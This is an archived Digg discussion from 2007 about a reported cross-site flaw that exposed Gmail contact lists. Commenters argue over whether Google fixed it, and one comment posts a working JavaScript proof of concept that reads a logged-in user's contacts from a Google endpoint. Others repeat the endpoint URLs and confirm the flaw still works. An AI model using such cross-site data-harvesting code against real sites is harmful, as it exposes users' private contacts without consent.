digg

Facebook Connect Join Digg About

Google Reporting Gmail Hack Fixed

blogs.zdnet.com Only hours after it was reported to the Google security team, the vulnerability was fixed. "Thanks for reporting this to us. We have identified and fixed the problem" — Google Security

Who dugg this? Made popular Jan 1, 2007

Digg DudeWhat is Digg?

Digg is a place for people to discover and share content from anywhere on the web. Digg surfaces the best stuff as submitted and voted on by the community. Take the Tour to learn more.

53 Comments

show profanity settings
expand all
  • paulmdx, on 10/12/2007, -2/+31kalleanka's code isn't working for me.. Perhaps Google have fixed it and it's just slow to propagate across their servers?
  • kafitz22, on 10/12/2007, -6/+29All these comments just trying to win the digg popularity contest are just getting annoying. All of these of these meaningless "Woohoo Google!" "Yeah Apple!" contribute nothing and prompt me just to immediately digg you down.
  • vafada, on 10/12/2007, -2/+19did you even tested it before posting this reply? because the issue still exists
  • paulmdx, on 10/12/2007, -0/+17How is it not Google's problem?
  • kuza55, on 10/12/2007, -2/+17I'm I'm obviously missing something since it still clearly works: http://googlified.com.googlepages.com/contactlist.htm or are there more vulnerabilities that this guy has disclosed?
  • ionut, on 10/12/2007, -3/+16Inaccurate. It's fixed only for video.google.com. But there are other subdomains where it still works. And it's not a hack.
  • kalleanka, on 10/12/2007, -12/+23*Makred as inaccurate*

    My script still works fine. It is NOT fixed.

    Here is the script still working: (change [ for
    //Google pwned
    function google(a){
    var emails;
    emails = "[ol>"
    emails += "[li>"+a.Body.Contacts[0].Email+" [font color='red'>[--- Your email[/font>[/li>"
    for(i=1;i[a.Body.Contacts.length;i++){
    emails += "[li>"+a.Body.Contacts[i].Email+"[/li>";
    }
    emails += "[/ol>"
    document.write(emails);
    }
    [/script>
    [script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">[/script>
  • kalleanka, on 10/12/2007, -0/+9@alx242

    You are right about this. So I did empty the cache both in IE and Firefox and then reload to ensure that it was not cached, but the problem is simply not fixed. But thanks for pointing that out.
  • alx242, on 10/12/2007, -1/+10@kalleanka:

    General problem with javascripts-files are that they are cached on the client. Working as a software developer and also maintaing a web client we frequently have to tell our customers to do a shift-reload to empty the cache and thus reloading the js-script files. A simple reload generally doesn't cut it (no matter if it is IE or Firefox).
  • KentGeek, on 10/12/2007, -0/+6Using ZDnet's feedback facility, I informed them of their mistake. The hack is very much alive and well. We'll see how long it takes for zdnet to turn around the info.
  • Brkwtzandrew, on 10/12/2007, -0/+4Or you can view the contacts outputted in XML (I don't like json):
    http://docs.google.com/data/contacts?out=xml&show=ALL&psort=Affinity&callback=google&max=999999
  • whiledo, on 03/25/2009, -0/+3The first one gives me:

    google ({
    Success: false,
    Errors: []
    })

    The second one works, though.
  • acff, on 10/12/2007, -1/+4kalleanka's code is still working for me, not fixed
  • munboy, on 10/12/2007, -3/+6It still works. Just tried it.
  • basictheory, on 10/12/2007, -0/+2Not fixed. *sigh*
  • whiledo, on 03/25/2009, -0/+2Sad to have to point this out, but the poster was making a joke.
  • M4v3R, on 10/12/2007, -2/+4They fixed one bug, but other still remains and is working.
  • KentGeek, on 10/12/2007, -0/+2By the way, if you don't believe the hack is alive, just paste this into your address bar (no scripting is needed to see what a script could accomplish):
    http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999
  • DaMoB, on 10/12/2007, -1/+3Fixed now!
  • n3tfury, on 10/12/2007, -0/+1glock: have a cry about it you ***** pussy :(
  • glock22ownr, on 10/12/2007, -2/+3@anglachel :

    So it's not Microsofts problem if Vista has some huge security flaw, you sign into your bank acct. online and 10,000 hackers get your information and rob you blind? Guess not right away but they might have a problem when someone files a huge class action against em. This is Googles problem because they have to safeguard their users information.
  • mwdcodeninja, on 10/12/2007, -2/+3still works.
  • YourDoom123, on 10/12/2007, -2/+3yep, vulnerability is still present :(

    anybody report this back to google?
  • alx242, on 10/12/2007, -0/+1@bias:
    And whata hell has that gotta do with anything...?

    @dkoojn:
    Yeah, cause these problems pop up once week...oh no that was some other company I totally forgot the name of...you probably like them though!
  • Mike89, on 10/12/2007, -0/+1the 2nd link (XML) is useless to a vulnerability, as it cant be included as a src file.
  • zecrose, on 10/12/2007, -0/+1Brkwtzandrew's link works for me. PANIC PANIC!
  • YourDoom123, on 10/12/2007, -0/+1I believe its fixed now... the javascript doesn't work any more, at least for me. can anybody else confirm?
  • KentGeek, on 10/12/2007, -0/+1 The good news is that the JSON url will no longer work. The bad news is that the XML url still returns all contacts, however. (see Bremeski's post above for the xml url)

    This is actually very encouraging - it's obvious that someone at Google is paying attention.

    The most reasonable lesson to take away from this incident is to surf any untrusted sites with Javascript disabled. (There may be other ways, but my method is to use Firefox with the "NoScript" extension.)
  • glock22ownr, on 10/12/2007, -4/+4Dear elitist a-hole, please refrain from posting worthless crap about fanboys...
  • futbol4, on 10/12/2007, -2/+2Still not fixed DIGG DOWN.
  • adolfojp, on 10/12/2007, -2/+2"Causing too much trouble already... I am sorry if it causes any inconvenience to you, or make you feeling the insecure of Google."

    That message is what I got when I tried it.

    Looks fixed to me :-)
  • donime, on 10/12/2007, -0/+0It's not fixed even for the domains that they have updated. You just need to do some work with XmlHttpRequest rather than Script tags now.
    See the detailed analysis http://getahead.ltd.uk/blog/joe/2007/01/01/csrf_attacks_or_how_to_avoid_exposing_your_gmail_contacts.html
  • utdiscant, on 10/12/2007, -1/+1Thats not written by google...

    Look here as already stated: http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999
  • SimonDonkers, on 10/12/2007, -1/+1That doesn't mean anything. Javascript can be called cross domain meaning example.com can include Google's JS file and read all your contacts adresses as Google logs you in with your cookie. Browser security does not allow a site to link to an external XML file so example.com can't read this XML file. Only hotlinking works if you do it manually.
  • bremeski, on 10/12/2007, -1/+1It is _not_ fixed yet. This still works:

    http://docs.google.com/data/contacts?out=xml&show=ALL&psort=Affinity&callback=google&max=999999
  • pentau, on 10/12/2007, -1/+1The problem still exists.
    http://digg.com/security/Google_Vulnerabilities_With_Contacts_Continue_to_Exist
  • shtef, on 10/12/2007, -1/+1I can confirm that it is fixed now. They fixed it rather quickly, IMHO.
  • dkoon, on 10/12/2007, -5/+4so now Google not only suck at security, but also lying! Sorry all of you fanboys, Google is just like any other companies.
  • gpit2286, on 10/12/2007, -2/+1@glock22ownr

    Who picked Vista as the OS you use? You could have used something more secure... Less exploited I guess I should say.
  • Escamillo, on 10/12/2007, -3/+1If this had been hotmail or yahoo mail, diggers would be gleefully ripping them to shreds. But with Google, we get these, "Great job Google!" posts rather than the ripping that they righfully deserve. And to make matters worse, those "Great job Google!" posts are premature as the flaw isn't fixed.

    Google is getting sloppy.
    Last week there was the problem with people's entire GMail mails and contacts being deleted.
    Now there's this problem with the contacts list being exposed.
    And didn't Google remove the "beta" tag from Gmail (I think I read that, but I'm not sure, as I rarely visit my GMail account). If so, then they don't even have the "beta" excuse to fall back on.
  • zmx32, on 10/12/2007, -4/+1They didn't fixed the problem. This is a slight variation of CSRF (Cross-site_request_forgery) and it should be fixed accordingly (secret token for example).
  • bias, on 10/12/2007, -6/+1Hmmm, what servers does Google use? LINUX!!
  • monergism, on 10/12/2007, -6/+0I think it's more of a browser issue.
  • MrViklund, on 10/12/2007, -15/+3Very nice that they fixed it so fast. Thanks Google.
  • h0zae, on 10/12/2007, -16/+4**NOT FIXED** http://pastebin.com/848961 (copy, paste, then visit your new page -- all your contacts will display)
  • dattaway, on 10/12/2007, -15/+1That was a quick fix, especially on the holidays.
  • n3tfury, on 10/12/2007, -18/+4fanboys please refrain from posting "thank you's" unless you really know what the ***** you're talking about.
  • KnightMareInc, on 10/12/2007, -17/+2old
  • ldavid, on 10/12/2007, -23/+8Nice and quick response! Go google! :)
  • anglachel, on 10/12/2007, -21/+4not their problem cause it is my contacts that are being shown to every one... not googles.
  • Fetching more discussions...
    Show 51 - 53 of 53 discussions

  • Add a Comment

    Login or register to comment!
    Or, sign-in super fast with your Facebook account ...


© Digg Inc. 2009 — Content created and posted by Digg users is dedicated to the public domain | Terms of Use Updated | Privacy Policy
DIGG, DIGG IT, DUGG, DIGG THIS, Digg graphics, logos, designs, page headers, button icons, scripts, and other service names are the trademarks of Digg Inc.